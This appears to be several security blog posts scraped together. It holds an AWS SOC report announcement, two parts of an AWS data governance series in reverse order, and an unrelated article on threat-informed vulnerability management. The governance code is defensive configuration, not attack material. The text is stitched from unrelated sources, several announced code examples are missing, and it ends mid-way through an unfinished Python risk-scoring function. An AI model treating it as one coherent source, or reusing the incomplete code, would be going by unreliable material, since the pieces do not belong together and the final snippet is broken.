Amazon Web Services (AWS) is pleased to announce that the Fall 2025 System and Organization Controls (SOC) 1, 2, and 3 reports are now available. The reports cover 185 services over the 12-month period from October 1, 2024, to September 30, 2025, giving customers a full year of assurance. These reports demonstrate our ongoing commitment to meeting the heightened expectations for cloud service providers.
AWS strives to continuously bring services into the scope of its compliance programs to help customers meet their architectural and regulatory needs. You can view the current list of services in scope on our Services in Scope page. As an AWS customer, you can reach out to your AWS account team if you have any questions or feedback about SOC compliance.
To learn more about AWS compliance and security programs, see AWS Compliance Programs. As always, we value feedback and questions; reach out to the AWS Compliance team through the Contact Us page.
If you have feedback about this post, submit comments in the Comments section below.
In Part 1, we explored the foundational strategy, including data classification frameworks and tagging approaches. In this post, we examine the technical implementation approach and key architectural patterns for building a governance framework.
We explore governance controls across four implementation areas, building from foundational monitoring to advanced automation. Each area builds on the previous one, so you can implement incrementally and validate as you go:
Monitoring foundation: Begin by establishing your monitoring baseline. Set up AWS Config rules to track tag compliance across your resources, then configure Amazon CloudWatch dashboards to provide real-time visibility into your governance posture. By using this foundation, you can understand your current state before implementing enforcement controls.
Preventive controls: Build proactive enforcement by deploying AWS Lambda functions that validate tags at resource creation time. Implement Amazon EventBridge rules to trigger real-time enforcement actions and configure service control policies (SCPs) to establish organization-wide guardrails that prevent non-compliant resource deployment.
Automated remediation: Reduce manual intervention by setting up AWS Systems Manager Automation Documents that respond to compliance violations. Configure automated responses that correct common issues like missing tags or improper encryption and implement classification-based security controls that automatically apply appropriate protections based on data sensitivity.
Advanced features: Extend your governance framework with sophisticated capabilities. Deploy data sovereignty controls to help ensure regulatory compliance across AWS Regions, implement intelligent lifecycle management to optimize costs while maintaining compliance, and establish comprehensive monitoring and reporting systems that provide stakeholders with clear visibility into your governance effectiveness.
Prerequisites
Before beginning implementation, ensure you have the AWS Command Line Interface (AWS CLI) installed and configured with appropriate credentials for your target accounts. Set AWS Identity and Access Management (IAM) permissions so that you can create roles, Lambda functions, and AWS Config rules. Finally, basic familiarity with AWS CloudFormation or Terraform will be helpful, because we’ll use CloudFormation throughout our examples.
Tag governance controls
Implementing tag governance requires multiple layers of controls working together across AWS services. These controls range from preventive measures that validate resources at creation to detective controls that monitor existing resources. This section describes each control type, starting with preventive controls, which act as the first line of defense.
Preventive controls
Preventive controls help ensure resources are properly tagged at creation time. By implementing Lambda functions triggered by AWS CloudTrail events, you can validate tags before resources are created, preventing non-compliant resources from being deployed:
# AWS Lambda function for preventive tag enforcement
def enforce_resource_tags(event, context):
    required_tags = ['DataClassification', 'DataOwner', 'Environment']

    # Extract resource tags from the CloudTrail event
    resource_tags = event['detail']['requestParameters'].get('Tags', {})

    # Validate that all required tags are present
    missing_tags = [tag for tag in required_tags if tag not in resource_tags]

    if missing_tags:
        # Send alert to security team
        # Log non-compliance for compliance reporting
        raise Exception(f"Missing required tags: {missing_tags}")

    return {'status': 'compliant'}
AWS Organizations tag policies provide a foundation for consistent tagging across your organization. These policies define standard tag formats and values, helping to ensure consistency across accounts:
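As a sketch, a tag policy that enforces an allowed set of values for the DataClassification key might look like the following; the tag values and the enforced resource type are illustrative assumptions, not requirements:

```json
{
  "tags": {
    "DataClassification": {
      "tag_key": { "@@assign": "DataClassification" },
      "tag_value": { "@@assign": ["High", "Moderate", "Low"] },
      "enforced_for": { "@@assign": ["s3:bucket"] }
    }
  }
}
```

Attaching a policy like this at the organization root or an organizational unit standardizes both the tag key casing and the permitted values across member accounts.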
Tag-based access control gives you detailed permissions using attribute-based access control (ABAC). By using this approach, you can define permissions based on resource attributes rather than creating individual IAM policies for each use case:
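For example, an ABAC-style identity policy (a sketch; the action and tag key shown are illustrative) can grant access only when the caller's principal tag matches the resource's classification tag:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["s3:GetObject"],
      "Resource": "*",
      "Condition": {
        "StringEquals": {
          "aws:ResourceTag/DataClassification": "${aws:PrincipalTag/DataClassification}"
        }
      }
    }
  ]
}
```

Because the condition compares tags dynamically, one policy scales across classifications without per-team policy sprawl.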
While implementing tag governance within a single account is straightforward, most organizations operate in a multi-account environment. Implementing consistent governance across your organization requires additional controls:
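A common multi-account guardrail is a service control policy that denies resource creation when a required tag is absent. This sketch (the tag key is an illustrative assumption) blocks untagged EC2 instance launches organization-wide:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyUntaggedInstances",
      "Effect": "Deny",
      "Action": ["ec2:RunInstances"],
      "Resource": "arn:aws:ec2:*:*:instance/*",
      "Condition": {
        "Null": { "aws:RequestTag/DataClassification": "true" }
      }
    }
  ]
}
```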
Integration with on-premises governance frameworks
Many organizations maintain existing governance frameworks for their on-premises infrastructure. Extending these frameworks to AWS requires careful integration and applicability analysis. The following example shows how to use AWS Service Catalog to create a portfolio of AWS resources that align with your on-premises governance standards.
# AWS Service Catalog portfolio for on-premises-aligned resources
ServiceCatalogIntegration:
  Portfolio:
    Type: AWS::ServiceCatalog::Portfolio
    Properties:
      DisplayName: Enterprise-Aligned Resources
      Description: Resources that comply with existing governance framework
      ProviderName: Enterprise IT
  # Product that maintains on-prem naming conventions and controls
  CompliantProduct:
    Type: AWS::ServiceCatalog::CloudFormationProduct
    Properties:
      Name: Compliant-Resource-Bundle
      Owner: Enterprise Architecture
      Tags:
        - Key: OnPremMapping
          Value: "EntArchFramework-v2"
Automating security controls based on classification
After data is classified, use these classifications to automate security controls and use AWS Config to track and validate that resources are properly tagged through defined rules that assess your AWS resource configurations, including a built-in required-tags rule. For non-compliant resources, you can use Systems Manager to automate the remediation process.
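As a sketch, the built-in required-tags managed rule can be declared in CloudFormation as follows; the tag keys and resource types shown are illustrative assumptions:

```yaml
RequiredTagsRule:
  Type: AWS::Config::ConfigRule
  Properties:
    ConfigRuleName: required-tags-check
    Description: Flags resources missing the organization's required tags
    Source:
      Owner: AWS
      SourceIdentifier: REQUIRED_TAGS
    InputParameters:
      tag1Key: DataClassification
      tag2Key: DataOwner
      tag3Key: Environment
    Scope:
      ComplianceResourceTypes:
        - AWS::S3::Bucket
        - AWS::EC2::Instance
```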
With proper tagging in place, you can implement automated security controls using EventBridge and Lambda. By using this combination, you can create a cost-effective and scalable infrastructure for enforcing security policies based on data classification. For example, when a resource is tagged as high impact, you can use EventBridge to trigger a Lambda function to enable required security measures.
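As an illustrative sketch, the decision logic inside such a Lambda function might map classification tags to the controls to apply. The tag values and control names here are assumptions for illustration, not AWS-defined identifiers:

```python
# Hypothetical mapping of DataClassification tag values to controls.
CONTROLS_BY_CLASSIFICATION = {
    "high": ["enable_encryption", "block_public_access", "enable_access_logging"],
    "moderate": ["enable_encryption", "enable_access_logging"],
    "low": ["enable_access_logging"],
}

def controls_for_resource(tags):
    """Return the controls to apply based on the DataClassification tag.

    Fails closed: a missing or unrecognized classification gets the
    strictest control set rather than none.
    """
    classification = tags.get("DataClassification", "high").lower()
    return CONTROLS_BY_CLASSIFICATION.get(
        classification, CONTROLS_BY_CLASSIFICATION["high"]
    )
```

In a real deployment, the returned control names would drive boto3 calls (for example, enabling default encryption on a bucket) inside the EventBridge-triggered Lambda function.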
Automating controls in this way applies security measures consistently, reducing human error and maintaining compliance. Code-based controls help ensure that the protections applied match your data classification.
Data sovereignty and residency requirements help you comply with regulations like GDPR. Such controls can be implemented to restrict data storage and processing to specific AWS Regions:
# Config rule for region restrictions
AWSConfig:
  ConfigRule:
    Type: AWS::Config::ConfigRule
    Properties:
      ConfigRuleName: s3-bucket-region-check
      Description: Checks if S3 buckets are in allowed regions
      Source:
        Owner: AWS
        SourceIdentifier: S3_BUCKET_REGION
      InputParameters:
        allowedRegions:
          - eu-west-1
          - eu-central-1
Note: This example uses eu-west-1 and eu-central-1 because these Regions are commonly used for GDPR compliance, providing data residency within the European Union. Adjust these Regions based on your specific regulatory requirements and business needs. For more information, see Meeting data residency requirements on AWS and Controls that enhance data residence protection.
Disaster recovery integration with governance controls
While organizations often focus on system availability and data recovery, maintaining governance controls during disaster recovery (DR) scenarios is important for compliance and security. To implement effective governance in your DR strategy, start by using AWS Config rules to check that DR resources maintain the same governance standards as your primary environment:
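For example, a sketch of such a check using an AWS managed rule (the rule name and scope are illustrative) verifies that critical S3 buckets have replication enabled into the DR Region:

```yaml
DrReplicationRule:
  Type: AWS::Config::ConfigRule
  Properties:
    ConfigRuleName: dr-s3-replication-check
    Description: Checks that governed S3 buckets have replication enabled
    Source:
      Owner: AWS
      SourceIdentifier: S3_BUCKET_REPLICATION_ENABLED
    Scope:
      ComplianceResourceTypes:
        - AWS::S3::Bucket
```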
For your most critical data (classified as Level 1 in part 1 of this post), implement cross-Region replication while maintaining strict governance controls. This helps ensure that sensitive data remains protected even during failover scenarios:
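A sketch of the replication rule portion of such a bucket definition follows; the destination bucket, the KMS key and role references, and the tag value are assumptions for illustration:

```yaml
ReplicationConfiguration:
  Role: !GetAtt ReplicationRole.Arn        # hypothetical IAM role resource
  Rules:
    - Id: level1-cross-region
      Status: Enabled
      Priority: 1
      Filter:
        TagFilter:                          # replicate only Level 1 objects
          Key: DataClassification
          Value: Level1
      Destination:
        Bucket: arn:aws:s3:::example-dr-bucket   # hypothetical DR bucket
        EncryptionConfiguration:
          ReplicaKmsKeyID: !GetAtt DrKmsKey.Arn  # hypothetical KMS key
      SourceSelectionCriteria:
        SseKmsEncryptedObjects:
          Status: Enabled
      DeleteMarkerReplication:
        Status: Disabled
```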
By combining AWS Config for resource compliance, CloudWatch for metrics and alerting, and Amazon Macie for sensitive data discovery, you can create a robust compliance monitoring framework that automatically detects and responds to compliance issues:
Figure 1: Compliance monitoring architecture
This architecture (shown in Figure 1) demonstrates how AWS services work together to provide compliance monitoring:
AWS Config, CloudTrail, and Macie monitor AWS resources
CloudWatch aggregates monitoring data
Alerts and dashboards provide real-time visibility
The following CloudFormation template implements these controls:
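A minimal sketch of such a template might pair a managed Config rule with an EventBridge notification path; the logical resource names and SNS topic are illustrative assumptions:

```yaml
Resources:
  ComplianceTopic:                          # hypothetical SNS topic for alerts
    Type: AWS::SNS::Topic
  EncryptionRule:
    Type: AWS::Config::ConfigRule
    Properties:
      ConfigRuleName: s3-default-encryption-check
      Source:
        Owner: AWS
        SourceIdentifier: S3_BUCKET_SERVER_SIDE_ENCRYPTION_ENABLED
  ComplianceChangeRule:
    Type: AWS::Events::Rule
    Properties:
      # Notify when any Config rule evaluation flips to NON_COMPLIANT
      EventPattern:
        source:
          - aws.config
        detail-type:
          - Config Rules Compliance Change
        detail:
          newEvaluationResult:
            complianceType:
              - NON_COMPLIANT
      Targets:
        - Arn: !Ref ComplianceTopic
          Id: NotifySecurityTeam
```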
These controls provide real-time visibility into your security posture, automate responses to potential security events, and use Macie for sensitive data discovery and classification. For a complete monitoring setup, review List of AWS Config Managed Rules and Using Amazon CloudWatch dashboards.
Using AWS data lakes for governance
Modern data governance strategies often use data lakes to provide centralized control and visibility. AWS provides a comprehensive solution through the Modern Data Architecture Accelerator (MDAA), which you can use to help you rapidly deploy and manage data platform architectures with built-in security and governance controls. Figure 2 shows an MDAA reference architecture.
Understanding and managing access patterns is important for effective governance. Use CloudTrail and Amazon Athena to analyze access patterns:
SELECT
useridentity.arn,
eventname,
requestparameters.bucketname,
requestparameters.key,
COUNT(*) as access_count
FROM cloudtrail_logs
WHERE eventname IN ('GetObject', 'PutObject')
GROUP BY 1, 2, 3, 4
ORDER BY access_count DESC
LIMIT 100;
This query helps identify frequently accessed data and unusual patterns in access behavior. These insights help you to:
Optimize storage tiers based on access frequency
Refine DR strategies for frequently accessed data
Identify potential security risks through unusual access patterns
Fine-tune data lifecycle policies based on usage patterns
For sensitive data discovery, consider integrating Macie to automatically identify and protect PII across your data estate.
Machine learning model governance with SageMaker
As organizations advance in their data governance journey, many are deploying machine learning models in production, necessitating governance frameworks that extend to machine learning (ML) operations. Amazon SageMaker offers advanced tools that you can use to maintain governance over ML assets without impeding innovation.
SageMaker governance tools work together to provide comprehensive ML oversight:
Role Manager provides fine-grained access control for ML roles
Model Cards centralize documentation and lineage information
Model Dashboard offers organization-wide visibility into deployed models
Model Monitor automates drift detection and quality control
The following example configures SageMaker governance controls:
# Basic/high-level ML governance setup with role and monitoring
SageMakerRole:
  Type: AWS::IAM::Role
  Properties:
    # Allow SageMaker to use this role
    AssumeRolePolicyDocument:
      Statement:
        - Effect: Allow
          Principal:
            Service: sagemaker.amazonaws.com
          Action: sts:AssumeRole
    # Attach necessary permissions
    ManagedPolicyArns:
      - arn:aws:iam::aws:policy/AmazonSageMakerFullAccess

ModelMonitor:
  Type: AWS::SageMaker::MonitoringSchedule
  Properties:
    # Set up hourly model monitoring
    MonitoringScheduleName: hourly-model-monitor
    ScheduleConfig:
      ScheduleExpression: 'cron(0 * * * ? *)' # Run hourly
This example demonstrates two essential governance controls: role-based access management for secure service interactions and automated hourly monitoring for ongoing model oversight. While these technical implementations are important, remember that successful ML governance requires integration with your broader data governance framework, helping to ensure consistent controls and visibility across your entire data and analytics ecosystem. For more information, see Model governance to manage permissions and track model performance.
Cost optimization through automated lifecycle management
Effective data governance isn’t just about security—it’s also about managing cost efficiently. Implement intelligent data lifecycle management based on classification and usage patterns, as shown in Figure 3:
Figure 3: Tag-based lifecycle management in Amazon S3
Figure 3 illustrates how tags drive automated lifecycle management:
S3 Lifecycle automatically optimizes storage costs while maintaining compliance with retention requirements. For example, data initially stored in Amazon S3 Intelligent-Tiering automatically moves to Amazon S3 Glacier after 90 days, significantly reducing storage costs while helping to ensure data remains available when needed. For more information, see Managing the lifecycle of objects and Managing storage costs with Amazon S3 Intelligent-Tiering.
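A sketch of such a tag-driven lifecycle rule in CloudFormation follows; the bucket name, tag value, and transition window are illustrative assumptions:

```yaml
GovernedDataBucket:
  Type: AWS::S3::Bucket
  Properties:
    LifecycleConfiguration:
      Rules:
        - Id: tier-by-classification
          Status: Enabled
          TagFilters:                 # apply only to internal-use data
            - Key: DataClassification
              Value: Level2
          Transitions:
            - StorageClass: GLACIER   # archive after 90 days
              TransitionInDays: 90
```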
Conclusion
Successfully implementing data governance on AWS requires both a structured approach and adherence to key best practices. As you progress through your implementation journey, keep these fundamental principles in mind:
Start with a focused scope and gradually expand. Begin with a pilot project that addresses high-impact, low-complexity use cases. By using this approach, you can demonstrate quick wins while building experience and confidence in your governance framework.
Make automation your foundation. Apply AWS services such as Amazon EventBridge for event-driven responses, implement automated remediation for common issues, and create self-service capabilities that balance efficiency with compliance. This automation-first approach helps ensure scalability and consistency in your governance framework.
Maintain continuous visibility and improvement. Regular monitoring, compliance checks, and framework updates are essential for long-term success. Use feedback from your operations team to refine policies and adjust controls as your organization’s needs evolve.
Common challenges to be aware of:
Initial resistance to change from teams used to manual processes
Complexity in handling legacy systems and data
Balancing security controls with operational efficiency
Maintaining consistent governance across multiple AWS accounts and Regions
For more information, implementation support, and guidance, see the AWS resources linked throughout this post.
By following this approach and remaining mindful of potential challenges, you can build a robust, scalable data governance framework that grows with your organization while maintaining security, compliance, and efficient data operations.
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.
Generative AI and machine learning workloads create massive amounts of data. Organizations need data governance to manage this growth and stay compliant. While data governance isn’t a new concept, recent studies highlight a concerning gap: a Gartner study of 300 IT executives revealed that only 60% of organizations have implemented a data governance strategy, with 40% still in planning stages or uncertain where to begin. Furthermore, a 2024 MIT CDOIQ survey of 250 chief data officers (CDOs) found that only 45% identify data governance as a top priority.
Although most businesses recognize the importance of data governance strategies, regular evaluation is important to ensure these strategies evolve with changing business needs, industry requirements, and emerging technologies. In this post, we show you a practical, automation-first approach to implementing data governance on Amazon Web Services (AWS) through a strategic and architectural guide—whether you’re starting at the beginning or improving an existing framework.
In this two-part series, we explore how to build a data governance framework on AWS that’s both practical and scalable. Our approach aligns with what AWS has identified as the core benefits of data governance:
Classify data consistently and automate controls to improve quality
Give teams secure access to the data they need
Monitor compliance automatically and catch issues early
In this post, we cover strategy, classification framework, and tagging governance—the foundation you need to get started. If you don’t already have a governance strategy, we provide a high-level overview of AWS tools and services to help you get started. If you have a data governance strategy, the information in this post can assist you in evaluating its effectiveness and understanding how data governance is evolving with new technologies.
In Part 2, we explore the technical architecture and implementation patterns with conceptual code examples, and throughout both parts, you’ll find links to production-ready AWS resources for detailed implementation.
Prerequisites
Before implementing data governance on AWS, you need the right AWS setup and buy-in from your teams.
Beyond these services, you’ll use several AWS tools for automation and enforcement. The AWS service quick reference table that follows lists everything used throughout this guide.
Organizational readiness
Successful implementation of data governance requires clear organizational alignment and preparation across multiple dimensions.
Define roles and responsibilities. Data owners classify data and approve access requests. Your platform team handles AWS infrastructure and builds automation, while security teams set controls and monitor compliance. Application teams then implement these standards in their daily workflows.
Document your compliance requirements. List the regulations you must follow—GDPR, PCI-DSS, SOX, HIPAA, or others. Create a data classification framework that aligns with your business risk. Document your tagging standards and naming conventions so everyone follows the same approach.
Plan for change management. Get executive support from leaders who understand why governance matters. Start with pilot projects to demonstrate value before rolling out organization-wide. Provide role-based training and maintain up-to-date governance playbooks. Establish feedback mechanisms so teams can report issues and suggest improvements.
Key performance indicators (KPIs) to monitor
To measure the effectiveness of your data governance implementation, track the following essential metrics and their target objectives.
Resource tagging compliance: Aim for 95%, measured through AWS Config rules with weekly monitoring, focusing on critical resources and sensitive data classifications.
Mean time to respond to compliance issues: Target less than 24 hours for critical issues, tracked using CloudWatch metrics with automated alerting for high-priority non-compliance events.
Reduction in manual governance tasks: Target reduction of 40% in the first year. Measured through automated workflow adoption and remediation success rates.
Storage cost optimization based on data classification: Target 15–20% reduction through intelligent tiering and lifecycle policies, monitored monthly by classification level.
With these technical and organizational foundations in place, you’re ready to implement a sustainable data governance framework.
AWS services used in this guide – Quick reference
This implementation uses the following AWS services. Some are prerequisites, while others are introduced throughout the guide.
AWS Config: Continuously monitors resource configurations and evaluates them against rules you define (such as requiring that all S3 buckets be encrypted). When it finds resources that don’t meet your rules, it flags them as non-compliant so you can fix them manually or automatically.
Amazon EventBridge: Acts as a central notification system that watches for specific events in your AWS environment (such as when an S3 bucket is created) and automatically triggers actions in response (such as running a Lambda function to check whether it has the required tags). Think of it as an if this happens, then do that automation engine.
AWS Systems Manager: Automates operational tasks across your AWS resources. In governance, it’s primarily used to automatically fix non-compliant resources; for example, if AWS Config detects an unencrypted database, Systems Manager can run a pre-defined script to enable encryption without manual intervention.
Amazon Macie: Uses machine learning to automatically discover, classify, and protect sensitive data like personally identifiable information (PII) across your S3 buckets.
Amazon SageMaker: Provides specialized tools for governing machine learning operations, including model monitoring, documentation, and access control.
Understanding the data governance challenge
Organizations face complex data management challenges, from maintaining consistent data classification to ensuring regulatory compliance across their environments. Your strategy should maintain security, ensure compliance, and enable business agility through automation. While this journey can be complex, breaking it down into manageable components makes it achievable.
The foundation: Data classification framework
Data classification is a foundational step in cybersecurity risk management and data governance strategies. Organizations should use data classification to determine appropriate safeguards for sensitive or critical data based on their protection requirements. Following the NIST (National Institute of Standards and Technology) framework, data can be categorized based on the potential impact to confidentiality, integrity, and availability of information systems:
High impact: Severe or catastrophic adverse effect on organizational operations, assets, or individuals
Moderate impact: Serious adverse effect on organizational operations, assets, or individuals
Low impact: Limited adverse effect on organizational operations, assets, or individuals
Before implementing controls, establishing a clear data classification framework is essential. This framework serves as the backbone of your security controls, access policies, and automation strategies. The following is an example of how a company subject to the Payment Card Industry Data Security Standard (PCI-DSS) might classify data:
Level 1 – Restricted data:
Examples: Cardholder data and other payment information
Security controls: Encryption at rest and in transit, strict access controls, comprehensive audit logging
Level 2 – Internal use data:
Examples: Internal documentation, proprietary business information, development code
Security controls: Standard encryption, role-based access control
Level 3 – Public data:
Examples: Marketing materials, public documentation, press releases
Security controls: Integrity checks, version control
To help with data classification and tagging, AWS created AWS Resource Groups, a service that you can use to organize AWS resources into groups using criteria that you define as tags. If you’re using multiple AWS accounts across your organization, AWS Organizations supports tag policies, which you can use to standardize the tags attached to AWS resources across an organization’s accounts. The workflow for using tagging is shown in Figure 1. For more information, see Guidance for Tagging on AWS.
Figure 1: Workflow for tagging on AWS for a multi-account environment
Your tag governance strategy
A well-designed tagging strategy is fundamental to automated governance. Tags not only help organize resources but also enable automated security controls, cost allocation, and compliance monitoring.
Figure 2: Tag governance workflow
As shown in Figure 2, tag policies use the following process:
AWS validates tags when you create resources.
Non-compliant resources trigger automatic remediation, while compliant resources deploy normally.
Continuous monitoring catches drift from your policies.
The following tagging strategy enables automation:
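For example, a baseline tag schema might look like the following; the keys and allowed values shown are illustrative assumptions to adapt to your own standards:

```yaml
# Illustrative baseline tag schema
DataClassification: High | Moderate | Low    # drives automated security controls
DataOwner: <team-or-individual>              # routes access requests and approvals
Environment: prod | dev | test               # scopes enforcement strictness
RetentionPeriod: <days>                      # drives lifecycle and deletion policies
CostCenter: <business-unit-code>             # enables cost allocation reporting
```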
While AWS Organizations tag policies provide a foundation for consistent tagging, comprehensive tag governance requires additional enforcement mechanisms, which we explore in detail in Part 2.
Conclusion
This first part of the two-part series established the foundational elements of implementing data governance on AWS, covering data classification frameworks, effective tagging strategies, and organizational alignment requirements. These fundamentals serve as building blocks for scalable and automated governance approaches. Part 2 focuses on technical implementation and architectural patterns, including monitoring foundations, preventive controls, and automated remediation. The discussion extends to tag-based security controls, compliance monitoring automation, and governance integration with disaster recovery strategies. Additional topics include data sovereignty controls and machine learning model governance with Amazon SageMaker, supported by AWS implementation examples.
Traditional vulnerability management tools can no longer keep up with the speed of modern exploitation—threat context is now mandatory.
Threat and Vulnerability Management (TVM) systems unify asset discovery, vulnerability data, and real-time external threat intelligence to prioritize real risk.
Static CVSS scores fail to reflect exploitation likelihood; intelligence-driven, dynamic risk scoring is essential in 2026.
Organizations that integrate vulnerability intelligence and attack surface intelligence reduce remediation time and security waste, enhancing detection and remediation while reducing alert fatigue.
Why Threat and Vulnerability Management Must Evolve in 2026
Security teams find themselves at a crossroads. Year over year, CVE volumes continue to surge. Exploitation is faster, more automated, and more targeted, and attacks are growing in volume, velocity, and sophistication alike. As a result, security teams are expected to “patch faster” with fewer resources and can no longer realistically keep up with this ever-rising tide of threats.
Under these pressures, vulnerability management has become an exercise in sheer volume rather than risk. Day in and day out, teams are overwhelmed by alerts that lack real-world context, making it all but impossible to assess the actual degree of risk.
Thankfully, there is a solution. Threat-informed vulnerability management (TVM) has emerged to counteract this trend, enabling security teams to intelligently address weaponized vulnerabilities, zero-day exploits, and supply chain and cloud-native risk. All of this comes with much-needed relief from creeping alert fatigue.
In 2026, effective cybersecurity programs will be defined not by how many vulnerabilities they detect but by how precisely they understand, prioritize, and neutralize real threats using intelligence-driven TVM systems.
The Core Problem: Alert Fatigue and Prioritization Failure
As it stands today, the explosion in disclosed vulnerabilities (CVEs) has outpaced security teams’ ability to triage and manage patching effectively. The vast majority of organizations cannot remediate more than a fraction of the total identified issues affecting their environments.
Traditionally, the Common Vulnerability Scoring System (CVSS) was the standard answer to this prioritization challenge. CVSS is an open, standardized framework used to assess the severity of security vulnerabilities by assigning a numerical score based on factors like exploitability, impact, and scope. Organizations use CVSS scores to prioritize remediation and compare vulnerabilities consistently across systems and vendors.
However, CVSS only measures theoretical severity, not exploitation likelihood. It misses critical pieces of context for prioritization decisions such as:
Is exploit code available?
Is the vulnerability actively exploited?
Are threat actors discussing or operationalizing it?
As a result, high-severity CVEs that pose little real-world risk continue to consume time and resources, leading us back once again to the issue of alert fatigue and the inability to effectively triage and patch the most pressing vulnerabilities.
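The contrast between static severity and contextual risk can be sketched in a few lines. The weights below are illustrative assumptions, not a published standard; the point is that in-the-wild exploitation should dominate theoretical severity:

```python
def contextual_risk_score(cvss, exploit_available, actively_exploited, actor_chatter):
    """Blend a static CVSS base score with exploitation signals.

    Weights are illustrative: active exploitation outweighs a public
    PoC, which outweighs threat-actor chatter. The result is capped
    at the 10.0 CVSS ceiling.
    """
    score = cvss            # start from theoretical severity (0-10)
    if exploit_available:
        score += 2.0        # public exploit code raises likelihood
    if actively_exploited:
        score += 4.0        # in-the-wild exploitation dominates
    if actor_chatter:
        score += 1.0        # threat-actor discussion is an early signal
    return min(score, 10.0)
```

Under a model like this, a medium-severity CVE with a public exploit can outrank a high-severity CVE no attacker is touching, which is exactly the reordering that alert-fatigued teams need.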
At the same time, we are seeing modern organizations struggle with a “silo problem,” in which security, IT, and CTI (cyber threat intelligence) teams operate independently and with limited visibility and collaboration between one another. In many organizations, each of these teams ends up using different tools, establishing different priorities, sharing findings infrequently if at all, and adopting entirely different “risk languages” through which they understand, prioritize, and address threats.
Taken broadly, this leaves organizations without a unified, intelligence-driven view of risk. Lacking one, many adopt a de facto policy of “patch everything,” which carries significant costs, including:
Operational drag and burnout
Delayed remediation of truly dangerous vulnerabilities
Increased business risk despite increased effort
Fractured security operations
Both individually and in the aggregate, these side effects come at a significant detriment to organizational security, and as the number and diversity of CVEs continues to expand, that cost grows. Moving forward, organizations must find a better way.
The Evolving Threat Landscape Demands a New Approach
Today’s ever-changing landscape means that organizations must evolve along with it or risk falling dangerously behind. The rise of rapidly weaponized vulnerabilities (i.e., known software weaknesses that have moved beyond disclosure and into active attacker use) reflects a fundamental shift in how quickly and deliberately adversaries turn CVEs into operational threats. Today, the gap between disclosure, proof-of-concept release, and active exploitation has collapsed from months to days (or even hours), driven largely by exploit marketplaces, automated scanning, and widely shared tooling.
Attackers increasingly prioritize vulnerabilities that are easy to exploit, broadly applicable across cloud services, edge devices, and common dependencies, and capable of delivering fast returns. Once weaponized, these vulnerabilities manifest not as theoretical risk but as active intrusion campaigns, ransomware operations, and opportunistic internet-wide exploitation, making threat context essential for distinguishing true danger from background noise.
At the same time that weaponization is accelerating, attack surfaces are expanding and fragmenting across hybrid and multi-cloud environments, worsened by SaaS sprawl, shadow IT, and third-party and supply chain exposure. In this environment, it is critical that security teams have a clear understanding of vulnerabilities versus threats and work to establish an integrated approach between the two.
In short, a vulnerability is a technical weakness, while a threat is an actor, campaign, or event actively exploiting that weakness. To be truly effective, modern threat and vulnerability management (TVM) systems must merge both concepts to reflect real risk and separate signal from noise.
What Is Threat and Vulnerability Management (TVM)?
Threat and Vulnerability Management (TVM) — also called Threat-Informed Vulnerability Management — is a continuous, intelligence-driven process that prioritizes remediation based on three core variables:
Active exploitation
Threat actor behavior
Asset criticality
TVM differs from traditional vulnerability management (VM) in a number of critical ways. Traditional VM relies on periodic scans, static severity scoring, and a largely reactive patching process. TVM, on the other hand, employs continuous monitoring, external threat intelligence enrichment, and closed-loop remediation and validation.
This continuous, context-rich approach is foundational for modern security programs. Rather than inundating security teams with decontextualized CVEs and indiscriminate patching, modern TVM systems align security efforts with attacker reality. Reactive patching is replaced with proactive, risk-based decision-making, and as a result, organizations are able to reduce noise while simultaneously increasing the impact of their security operations.
The Five Core Pillars of Modern TVM Systems
As the speed and breadth of today’s threats continue to grow, traditional VM, being fundamentally reactive in nature, is no longer enough to keep up. In a world where new vulnerabilities are disclosed daily, TVM offers much-needed efficiency, intelligence, and proactiveness. However, not all TVM systems are created equal. Here are five core pillars of effective modern TVM systems to help you evaluate and assess solutions on the market.
1. Continuous Asset Discovery & Inventory
Modern TVM systems are invaluable in that they provide full visibility across the entirety of an organization’s growing and fragmented attack surface. This includes external-facing assets, shadow IT, and cloud and SaaS environments alike. By providing continuous asset discovery and a timely, up-to-date inventory of one’s assets, TVM systems allow for real-time, comprehensive attack-surface management.
Remember, you can’t defend what you can’t see. That’s why attack surface management (ASM) is a prerequisite for effective TVM. Without accurate, up-to-date asset inventories, vulnerability data is incomplete and misleading. Continuous discovery ensures defenders see their environment the way attackers do.
2. Vulnerability Assessment & Scoring
TVM goes beyond internal scanning tools to identify vulnerabilities exposed to the internet and reassess them continuously as environments change. This includes tracking misconfigurations, outdated services, and newly introduced exposure, not just known CVEs.
3. External Threat Context Enrichment
This is where TVM fundamentally diverges from legacy approaches. External threat intelligence enriches vulnerability data with insight from dark web and criminal forums, exploit marketplaces, malware telemetry, and active attack campaigns.
Vulnerabilities are mapped to known threat actors, active exploitation, and MITRE ATT&CK® techniques, ultimately transforming raw findings into actionable intelligence.
4. Risk-Based Prioritization (RBVM)
Risk-based vulnerability management prioritizes issues based on the probability of exploitation, asset importance, and threat actor interest. This shifts the focus from “most severe” to “most dangerous,” enabling teams to address the vulnerabilities that pose the greatest immediate risk to their organizations.
5. Automated Remediation & Verification
Modern TVM integrates directly with IT and SecOps workflows, pushing prioritized findings into ticketing and automation platforms. Just as importantly, it verifies remediation to confirm that patches were applied and exposure was actually reduced, creating a continuous feedback loop.
These five pillars of effective TVM systems come together to create a whole that is greater than the sum of its parts. These systems, unlike their predecessors, are designed to continuously monitor and triage real threats and vulnerabilities in context, enabling awareness and proactive mitigation without burnout and alert fatigue.
Stop Patching Everything — Use Intelligence to Prioritize Real Risk
The scale of the CVE problem is overwhelming. Tens of thousands of vulnerabilities are disclosed each year, yet only a small fraction are ever exploited in the wild. Treating them all as equally urgent is not just inefficient — it’s dangerous.
Vulnerability intelligence changes the equation by tracking a CVE across its full lifecycle, from initial disclosure to weaponization, exploitation, and criminal adoption. This enables dynamic risk scoring that reflects real-world conditions rather than static assumptions.
Dynamic risk scoring incorporates evidence of active exploitation, availability of exploit code, dark web chatter, and threat actor interest. As conditions change, so does the risk score, ensuring prioritization remains aligned with attacker behavior.
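As a concrete illustration, dynamic scoring of this kind can be sketched as a weighted sum over live evidence signals. The signal names and weights below are purely illustrative, not any vendor's actual model:

```python
# Illustrative sketch of dynamic, evidence-based risk scoring for a CVE.
# Signal names and weights are hypothetical, not any vendor's actual model.

def dynamic_risk_score(signals: dict) -> int:
    """Score a CVE 0-100 from current threat evidence, not static severity."""
    weights = {
        "active_exploitation": 40,   # observed exploitation in the wild
        "exploit_code_public": 25,   # PoC or weaponized exploit available
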